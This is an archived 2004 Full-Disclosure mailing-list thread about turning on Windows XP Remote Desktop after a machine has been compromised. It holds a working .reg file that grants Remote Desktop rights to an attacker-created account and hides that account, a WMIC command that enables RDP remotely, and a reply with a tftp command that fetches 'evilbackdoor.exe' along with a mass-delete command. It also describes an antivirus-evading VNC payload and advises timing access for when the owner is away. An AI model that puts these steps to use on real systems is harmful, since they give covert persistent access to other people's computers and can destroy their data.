Re: [Full-Disclosure] XP Remote Desktop Remote Activation
Funny you should mention that, I was just wondering last night how to use PEX to turn this into a Metasploit payload...:-) One of these days I've got to sit down and start tinkering with it as there's 2 or 3 payloads I want to add to Metasploit (mostly custom backdoors), but I'm lazy and haven't gotten around to it. Fixer On Sun, 3 Oct 2004 00:58:18 -0500, H D Moore <[EMAIL PROTECTED]> wrote: > If the exploit was written as a module for the Metasploit Framework, just > select the VNC in-memory DLL injection payload and call it done. This > payload has the following advantages: > > - No files are written to disk, the AV has no chance of catching it > - The VNC server is a thread in the exploited app's process > - The payload works in read-only mode if admin privs aren't obtained > - It will use the WinLogon desktop if locked or nobody is logged in > - A command prompt is provided with the privs of the exploited process > - If the exploit causes the app to exit on crash, no traces are left > > http://metasploit.com/images/vnc.jpg > http://metasploit.com/projects/Framework/ > > -HD > > On Friday 01 October 2004 23:50, Fixer wrote:n > > > > Windows XP Professional provides a service called Remote Desktop, > > which allows a user to remotely control the desktop as if he or she > > were in front of the system locally (ala VNC, pcAnywhere, etc.). > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] XP Remote Desktop Remote Activation
If the exploit was written as a module for the Metasploit Framework, just select the VNC in-memory DLL injection payload and call it done. This payload has the following advantages: - No files are written to disk, the AV has no chance of catching it - The VNC server is a thread in the exploited app's process - The payload works in read-only mode if admin privs aren't obtained - It will use the WinLogon desktop if locked or nobody is logged in - A command prompt is provided with the privs of the exploited process - If the exploit causes the app to exit on crash, no traces are left http://metasploit.com/images/vnc.jpg http://metasploit.com/projects/Framework/ -HD On Friday 01 October 2004 23:50, Fixer wrote:n > > Windows XP Professional provides a service called Remote Desktop, > which allows a user to remotely control the desktop as if he or she > were in front of the system locally (ala VNC, pcAnywhere, etc.). ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] XP Remote Desktop Remote Activation
That I can't say as I actually developed this several months ago and just now released it because of SP2, which makes it a bit harder to pull this off. You're absolutely right that when you remotely access the machine that it locks out the user. The upside (or maybe downside) is that alot of home users still leave their machines on all night so that's not a big deal, just use NET TIME to check the local time and run RD when they aren't likely to be on. Worst case is that you'll get booted when they reset the machine :-( Fixer On Sat, 2 Oct 2004 12:56:24 -0500, RandallM <[EMAIL PROTECTED]> wrote: > Would access to command shell be accomplished via the recent ZoneID hole if > such Administration password access is not available? Or perhaps even with > the launching > Of the MS04-028 exploit? Of course any Terminal usage on home pc's are > noticed because users > are locked out. Now terminal servers are a differnet story but user > intervention is still needed. > > thank you > Randall M > > <|>--__--__-- > <|> > <|>Message: 3 > <|>Date: Fri, 1 Oct 2004 23:50:45 -0500 > <|>From: Fixer <[EMAIL PROTECTED]> > <|>Reply-To: Fixer <[EMAIL PROTECTED]> > <|>To: [EMAIL PROTECTED] > <|>Subject: [Full-Disclosure] XP Remote Desktop Remote Activation > <|> > <|>--=_Part_505_31077403.1096692645033 > <|>Content-Type: text/plain; charset=US-ASCII > <|>Content-Transfer-Encoding: 7bit > <|>Content-Disposition: inline > <|> > <|>XP Remote Desktop Remote Activation > <|> > <|> > <|>Information > <|> > <|>Windows XP Professional provides a service called Remote Desktop, > <|>which allows a user to remotely control the desktop as if he or she > <|>were in front of the system locally (ala VNC, pcAnywhere, etc.). > <|> > <|>By default, Remote Desktop is shipped with this service > <|>turned off and > <|>only the Administrator is allowed access to this service. It is > <|>possible, however, to modify a series of registry keys that may allow > <|>a malicious user who has already gained a command shell to activate > <|>Remote Desktop and add a user they have created for > <|>themselves as well > <|>as to hide that user so that it will not show up as a user in the > <|>Remote Desktop user list. The instructions for this are attached. > <|>Additionally, I have listed a sample .reg file of the type that is > <|>discussed in the instructions below. > <|>_ > <|> > > > > <|>--__--__-- > <|> > <|>Message: 6 > <|>From: "Dominick Baier" <[EMAIL PROTECTED]> > <|>To: "'Fixer'" <[EMAIL PROTECTED]>, > <|><[EMAIL PROTECTED]> > <|>Subject: RE: [Full-Disclosure] XP Remote Desktop Remote Activation > <|>Date: Sat, 2 Oct 2004 17:43:11 +0200 > <|> > <|>if you have an administrator password for the machine you > <|>can just use WMIC > <|>to turn remote desktop on. > <|> > <|>wmic /NODE:Server /USER:administrator RDTOGGLE WHERE > <|>ServerName="Server" > <|>CALL SetAllowTSConnections 1 > <|> > <|>End of Full-Disclosure Digest > <|> > > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] XP Remote Desktop Remote Activation
Agreed, but you'll note that this will only turn it on for Administrator, not for the user that you've created. At the point where you've gotten a remote shell (call it via lsass, dameware, or whatever) you're sitting there in the SYSTEM context. You've still got to create the account and give it rights to RD. Doing it that way is only half the battle. You could use VNC, but this way leaves less of a footprint since you're using the built-in MS utils. Fixer On Sat, 2 Oct 2004 17:43:11 +0200, Dominick Baier <[EMAIL PROTECTED]> wrote: > if you have an administrator password for the machine you can just use WMIC > to turn remote desktop on. > > wmic /NODE:Server /USER:administrator RDTOGGLE WHERE ServerName="Server" > CALL SetAllowTSConnections 1 > > dominick > www.leastprivilege.com > > > > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of Fixer > Sent: Samstag, 2. Oktober 2004 06:51 > To: [EMAIL PROTECTED] > Subject: [Full-Disclosure] XP Remote Desktop Remote Activation > > XP Remote Desktop Remote Activation > > Information > > Windows XP Professional provides a service called Remote Desktop, which > allows a user to remotely control the desktop as if he or she were in front > of the system locally (ala VNC, pcAnywhere, etc.). > > By default, Remote Desktop is shipped with this service turned off and only > the Administrator is allowed access to this service. It is possible, > however, to modify a series of registry keys that may allow a malicious user > who has already gained a command shell to activate Remote Desktop and add a > user they have created for themselves as well as to hide that user so that > it will not show up as a user in the Remote Desktop user list. The > instructions for this are attached. > Additionally, I have listed a sample .reg file of the type that is discussed > in the instructions below. > _ > > Final Stuff > > To the Frozen Chozen...On-On (www.frozen-chozen-h3.org) > > On to the exploit Fixer > > _ > > .reg file (remember, the xx xx are the values you need to change) > > Windows Registry Editor Version 5.00 > > [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\022B] > "C"=hex:2b,02,00,00,00,00,00,00,b0,00,00,00,02,00,01,00,b0,00,00,00,28,00,00 > ,\ > > 00,00,00,00,00,d8,00,00,00,7a,00,00,00,00,00,00,00,54,01,00,00,1c,00,00,00,\ > > 01,00,00,00,01,00,14,80,90,00,00,00,a0,00,00,00,14,00,00,00,44,00,00,00,02,\ > > 00,30,00,02,00,00,00,02,c0,14,00,13,00,05,01,01,01,00,00,00,00,00,01,00,00,\ > > 00,00,02,c0,14,00,ff,ff,1f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,00,4c,\ > > 00,03,00,00,00,00,00,14,00,0c,00,02,00,01,01,00,00,00,00,00,01,00,00,00,00,\ > > 00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,\ > > 00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,01,02,\ > > 00,00,00,00,00,05,20,00,00,00,20,02,00,00,01,02,00,00,00,00,00,05,20,00,00,\ > > 00,20,02,00,00,52,00,65,00,6d,00,6f,00,74,00,65,00,20,00,44,00,65,00,73,00,\ > > 6b,00,74,00,6f,00,70,00,20,00,55,00,73,00,65,00,72,00,73,00,4d,00,65,00,6d,\ > > 00,62,00,65,00,72,00,73,00,20,00,69,00,6e,00,20,00,74,00,68,00,69,00,73,00,\ > > 20,00,67,00,72,00,6f,00,75,00,70,00,20,00,61,00,72,00,65,00,20,00,67,00,72,\ > > 00,61,00,6e,00,74,00,65,00,64,00,20,00,74,00,68,00,65,00,20,00,72,00,69,00,\ > > 67,00,68,00,74,00,20,00,74,00,6f,00,20,00,6c,00,6f,00,67,00,6f,00,6e,00,20,\ > > 00,72,00,65,00,6d,00,6f,00,74,00,65,00,6c,00,79,00,00,00,01,05,00,00,00,00,\ > 00,05,15,00,00,00,d8,52,bb,80,c4,9d,6f,b9,b9,67,c7,13,xx,xx,00,00 > > [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] > "fDenyTSConnections"=dword: > > [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows > NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] > "lus3r"=dword: > > (obviously change "lus3r" to the name of the account you created) > > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE:[Full-Disclosure] XP Remote Desktop Remote Activation
Would access to command shell be accomplished via the recent ZoneID hole if such Administration password access is not available? Or perhaps even with the launching Of the MS04-028 exploit? Of course any Terminal usage on home pc's are noticed because users are locked out. Now terminal servers are a differnet story but user intervention is still needed. thank you Randall M <|>--__--__-- <|> <|>Message: 3 <|>Date: Fri, 1 Oct 2004 23:50:45 -0500 <|>From: Fixer <[EMAIL PROTECTED]> <|>Reply-To: Fixer <[EMAIL PROTECTED]> <|>To: [EMAIL PROTECTED] <|>Subject: [Full-Disclosure] XP Remote Desktop Remote Activation <|> <|>--=_Part_505_31077403.1096692645033 <|>Content-Type: text/plain; charset=US-ASCII <|>Content-Transfer-Encoding: 7bit <|>Content-Disposition: inline <|> <|>XP Remote Desktop Remote Activation <|> <|> <|>Information <|> <|>Windows XP Professional provides a service called Remote Desktop, <|>which allows a user to remotely control the desktop as if he or she <|>were in front of the system locally (ala VNC, pcAnywhere, etc.). <|> <|>By default, Remote Desktop is shipped with this service <|>turned off and <|>only the Administrator is allowed access to this service. It is <|>possible, however, to modify a series of registry keys that may allow <|>a malicious user who has already gained a command shell to activate <|>Remote Desktop and add a user they have created for <|>themselves as well <|>as to hide that user so that it will not show up as a user in the <|>Remote Desktop user list. The instructions for this are attached. <|>Additionally, I have listed a sample .reg file of the type that is <|>discussed in the instructions below. <|>_____________________________ <|> <|>--__--__-- <|> <|>Message: 6 <|>From: "Dominick Baier" <[EMAIL PROTECTED]> <|>To: "'Fixer'" <[EMAIL PROTECTED]>, <|><[EMAIL PROTECTED]> <|>Subject: RE: [Full-Disclosure] XP Remote Desktop Remote Activation <|>Date: Sat, 2 Oct 2004 17:43:11 +0200 <|> <|>if you have an administrator password for the machine you <|>can just use WMIC <|>to turn remote desktop on. <|> <|>wmic /NODE:Server /USER:administrator RDTOGGLE WHERE <|>ServerName="Server" <|>CALL SetAllowTSConnections 1 <|> <|>End of Full-Disclosure Digest <|> ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] XP Remote Desktop Remote Activation
>>By default, Remote Desktop is shipped with this service turned off and only the Administrator is allowed access to this service. It is possible, however, to modify a series of registry keys that may allow a malicious user who has already gained a command shell to activate Remote Desktop and ... Like everyone else is saying, if you already own the desktop why not use the user interface Microsoft helpfully provided for this? LJS ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] XP Remote Desktop Remote Activation
If someone installs a backdoor, that can be detected by AV scanner. If you gain temporary shell, open up the management interface, you'll have full control of the box without anyone becoming the wiser. Joel R. Helgeson Director of Networking & Security Services SymetriQ Corporation "Give a man fire, and he'll be warm for a day; set a man on fire, and he'll be warm for the rest of his life." - Original Message - From: "morning_wood" <[EMAIL PROTECTED]> To: "Fixer" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> Sent: Saturday, October 02, 2004 11:05 AM Subject: Re: [Full-Disclosure] XP Remote Desktop Remote Activation a malicious user who has already gained a command shell to activate umm... you already own the box. try... tftp -i yourhost get evilbackdoor.exe ( vnc mabey ) or c:\del *.exe /s c:\shutdown -r I realy do not see the SECURITY ISSUE here. cheers, m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] XP Remote Desktop Remote Activation
if you have an administrator password for the machine you can just use WMIC to turn remote desktop on. wmic /NODE:Server /USER:administrator RDTOGGLE WHERE ServerName="Server" CALL SetAllowTSConnections 1 dominick www.leastprivilege.com -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Fixer Sent: Samstag, 2. Oktober 2004 06:51 To: [EMAIL PROTECTED] Subject: [Full-Disclosure] XP Remote Desktop Remote Activation XP Remote Desktop Remote Activation Information Windows XP Professional provides a service called Remote Desktop, which allows a user to remotely control the desktop as if he or she were in front of the system locally (ala VNC, pcAnywhere, etc.). By default, Remote Desktop is shipped with this service turned off and only the Administrator is allowed access to this service. It is possible, however, to modify a series of registry keys that may allow a malicious user who has already gained a command shell to activate Remote Desktop and add a user they have created for themselves as well as to hide that user so that it will not show up as a user in the Remote Desktop user list. The instructions for this are attached. Additionally, I have listed a sample .reg file of the type that is discussed in the instructions below. _ Final Stuff To the Frozen Chozen...On-On (www.frozen-chozen-h3.org) On to the exploit Fixer _ .reg file (remember, the xx xx are the values you need to change) Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\022B] "C"=hex:2b,02,00,00,00,00,00,00,b0,00,00,00,02,00,01,00,b0,00,00,00,28,00,00 ,\ 00,00,00,00,00,d8,00,00,00,7a,00,00,00,00,00,00,00,54,01,00,00,1c,00,00,00,\ 01,00,00,00,01,00,14,80,90,00,00,00,a0,00,00,00,14,00,00,00,44,00,00,00,02,\ 00,30,00,02,00,00,00,02,c0,14,00,13,00,05,01,01,01,00,00,00,00,00,01,00,00,\ 00,00,02,c0,14,00,ff,ff,1f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,00,4c,\ 00,03,00,00,00,00,00,14,00,0c,00,02,00,01,01,00,00,00,00,00,01,00,00,00,00,\ 00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,\ 00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,01,02,\ 00,00,00,00,00,05,20,00,00,00,20,02,00,00,01,02,00,00,00,00,00,05,20,00,00,\ 00,20,02,00,00,52,00,65,00,6d,00,6f,00,74,00,65,00,20,00,44,00,65,00,73,00,\ 6b,00,74,00,6f,00,70,00,20,00,55,00,73,00,65,00,72,00,73,00,4d,00,65,00,6d,\ 00,62,00,65,00,72,00,73,00,20,00,69,00,6e,00,20,00,74,00,68,00,69,00,73,00,\ 20,00,67,00,72,00,6f,00,75,00,70,00,20,00,61,00,72,00,65,00,20,00,67,00,72,\ 00,61,00,6e,00,74,00,65,00,64,00,20,00,74,00,68,00,65,00,20,00,72,00,69,00,\ 67,00,68,00,74,00,20,00,74,00,6f,00,20,00,6c,00,6f,00,67,00,6f,00,6e,00,20,\ 00,72,00,65,00,6d,00,6f,00,74,00,65,00,6c,00,79,00,00,00,01,05,00,00,00,00,\ 00,05,15,00,00,00,d8,52,bb,80,c4,9d,6f,b9,b9,67,c7,13,xx,xx,00,00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] "fDenyTSConnections"=dword: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] "lus3r"=dword: (obviously change "lus3r" to the name of the account you created) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] XP Remote Desktop Remote Activation
> a malicious user who has already gained a command shell to activate umm... you already own the box. try... tftp -i yourhost get evilbackdoor.exe ( vnc mabey ) or c:\del *.exe /s c:\shutdown -r I realy do not see the SECURITY ISSUE here. cheers, m.wood ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html